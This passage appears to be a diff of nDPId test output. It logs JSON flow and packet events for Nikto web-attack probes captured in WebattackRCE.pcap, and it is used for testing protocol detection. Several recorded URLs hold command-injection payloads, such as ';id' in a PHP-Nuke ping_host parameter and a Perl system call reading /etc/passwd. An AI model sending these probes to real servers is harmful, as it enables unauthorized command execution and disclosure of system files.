00742{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_packet_id":1,"flow_last_seen":1576420277553,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":264,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":264,"pkt_l4_len":230,"thread_ts_msec":1576420277553,"pkt":"AAAAAAAAAAAAAAAACABFAAD6YiVAAEAG2dZ\/AAABfwAAAcXeH5DIEFrQ9+zWrIAYAED+7gAAAQEICp1m\/lmdZv5ZR0VUIC9tb2R1bGVzLnBocD9uYW1lPU5ldHdvcmtfVG9vbHMmZmlsZT1pbmRleCZmdW5jPXBpbmdfaG9zdCZoaW5wdXQ9JTNCaWQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjApDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01107{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7580000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1576420277553,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001160)"}} 
+01107{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":546,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":546,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277553,"flow_last_seen":1576420277553,"flow_idle_time":7580000,"flow_min_l4_payload_len":198,"flow_max_l4_payload_len":198,"flow_tot_l4_payload_len":198,"flow_avg_l4_payload_len":198,"midstream":1,"thread_ts_msec":1576420277553,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50654,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001160)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7580000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1576420277554,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00751{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_packet_id":1,"flow_last_seen":1576420277554,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":269,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":269,"pkt_l4_len":235,"thread_ts_msec":1576420277554,"pkt":"AAAAAAAAAAAAAAAACABFAAD\/xMZAAEAGdzB\/AAABfwAAAcXgH5A8ZfwprHRx4oAYAED+8wAAAQEICp1m\/lqdZv5aR0VUIC9udWtlL21vZHVsZXMucGhwP25hbWU9TmV0d29ya19Ub29scyZmaWxlPWluZGV4JmZ1bmM9cGluZ19ob3N0JmhpbnB1dD0lM0JpZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTYxKQ0KDQo="} -01113{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7580000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1576420277554,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/nuke\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001161)"}} 
+01113{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":547,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":547,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277554,"flow_last_seen":1576420277554,"flow_idle_time":7580000,"flow_min_l4_payload_len":203,"flow_max_l4_payload_len":203,"flow_tot_l4_payload_len":203,"flow_avg_l4_payload_len":203,"midstream":1,"thread_ts_msec":1576420277554,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50656,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/nuke\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001161)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7580000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420277556,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00710{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_packet_id":1,"flow_last_seen":1576420277556,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":240,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":240,"pkt_l4_len":206,"thread_ts_msec":1576420277556,"pkt":"AAAAAAAAAAAAAAAACABFAADi3pNAAEAGXYB\/AAABfwAAAcXiH5AliOZ9pOzTK4AYAED+1gAAAQEICp1m\/lydZv5cR0VUIC9wZXJsLy1lJTIwJTIyc3lzdGVtKCdjYXQlMjAvZXRjL3Bhc3N3ZCcpO1wlMjIgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjIpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01087{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7580000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420277556,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/perl\/-e%20%22system('cat%20\/etc\/passwd');\\%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001162)"}} 
+01087{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":548,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":548,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277556,"flow_last_seen":1576420277556,"flow_idle_time":7580000,"flow_min_l4_payload_len":174,"flow_max_l4_payload_len":174,"flow_tot_l4_payload_len":174,"flow_avg_l4_payload_len":174,"midstream":1,"thread_ts_msec":1576420277556,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50658,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/perl\/-e%20%22system('cat%20\/etc\/passwd');\\%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001162)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7580000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":204,"midstream":1,"thread_ts_msec":1576420277558,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00751{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_packet_id":1,"flow_last_seen":1576420277558,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":270,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":270,"pkt_l4_len":236,"thread_ts_msec":1576420277558,"pkt":"AAAAAAAAAAAAAAAACABFAAEAA3dAAEAGOH9\/AAABfwAAAcXkH5CI\/DuZGQJJI4AYAED+9AAAAQEICp1m\/l6dZv5eR0VUIC9waHBudWtlL2h0bWwvLnBocD9uYW1lPU5ldHdvcmtfVG9vbHMmZmlsZT1pbmRleCZmdW5jPXBpbmdfaG9zdCZoaW5wdXQ9JTNCaWQgSFRUUC8xLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDExNjMpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01115{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7580000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":204,"midstream":1,"thread_ts_msec":1576420277558,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpnuke\/html\/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001163)"}} 
+01115{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":549,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277558,"flow_last_seen":1576420277558,"flow_idle_time":7580000,"flow_min_l4_payload_len":204,"flow_max_l4_payload_len":204,"flow_tot_l4_payload_len":204,"flow_avg_l4_payload_len":204,"midstream":1,"thread_ts_msec":1576420277558,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50660,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpnuke\/html\/.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001163)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7580000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":206,"midstream":1,"thread_ts_msec":1576420277560,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00754{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_packet_id":1,"flow_last_seen":1576420277560,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":272,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":272,"pkt_l4_len":238,"thread_ts_msec":1576420277560,"pkt":"AAAAAAAAAAAAAAAACABFAAECBD1AAEAGN7d\/AAABfwAAAcXmH5DeDzzWjlOxJoAYAED+9gAAAQEICp1m\/mCdZv5gR0VUIC9waHBudWtlL21vZHVsZXMucGhwP25hbWU9TmV0d29ya19Ub29scyZmaWxlPWluZGV4JmZ1bmM9cGluZ19ob3N0JmhpbnB1dD0lM0JpZCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY0KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7580000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":206,"midstream":1,"thread_ts_msec":1576420277560,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpnuke\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001164)"}} 
+01116{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":550,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":550,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277560,"flow_last_seen":1576420277560,"flow_idle_time":7580000,"flow_min_l4_payload_len":206,"flow_max_l4_payload_len":206,"flow_tot_l4_payload_len":206,"flow_avg_l4_payload_len":206,"midstream":1,"thread_ts_msec":1576420277560,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50662,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpnuke\/modules.php?name=Network_Tools&file=index&func=ping_host&hinput=%3Bid","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001164)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277561,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_packet_id":1,"flow_last_seen":1576420277561,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277561,"pkt":"AAAAAAAAAAAAAAAACABFAADFzD1AAEAGb\/N\/AAABfwAAAcXoH5BUiPTWm6mSyIAYAED+uQAAAQEICp1m\/mGdZv5hR0VUIC9Qcm9ncmFtJTIwRmlsZXMvIEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277561,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/Program%20Files\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001165)"}} 
+01055{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":551,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":551,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277561,"flow_last_seen":1576420277561,"flow_idle_time":7580000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277561,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50664,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/Program%20Files\/","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001165)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277562,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_packet_id":1,"flow_last_seen":1576420277562,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":206,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":206,"pkt_l4_len":172,"thread_ts_msec":1576420277562,"pkt":"AAAAAAAAAAAAAAAACABFAADAFKZAAEAGJ5B\/AAABfwAAAcXqH5AjeyxLwwFcDYAYAED+tAAAAQEICp1m\/mKdZv5iR0VUIC9zbXNzZW5kLnBocCBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY2KQ0KDQo="} -01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277562,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/smssend.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001166)"}} 
+01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":552,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":552,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277562,"flow_last_seen":1576420277562,"flow_idle_time":7580000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420277562,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50666,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"6":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/smssend.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001166)"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7580000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277564,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00698{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_packet_id":1,"flow_last_seen":1576420277564,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":230,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":230,"pkt_l4_len":196,"thread_ts_msec":1576420277564,"pkt":"AAAAAAAAAAAAAAAACABFAADYoI5AAEAGm49\/AAABfwAAAcXsH5AgHJhkU1YzMYAYAED+zAAAAQEICp1m\/mOdZv5jR0VUIC9wbHMvc2ltcGxlZGFkL2FkbWluXy9kYWRlbnRyaWVzLmh0bSBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMTY3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KDQo="} -01076{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":553,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":553,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277564,"flow_last_seen":1576420277564,"flow_idle_time":7580000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":1,"thread_ts_msec":1576420277564,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50668,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 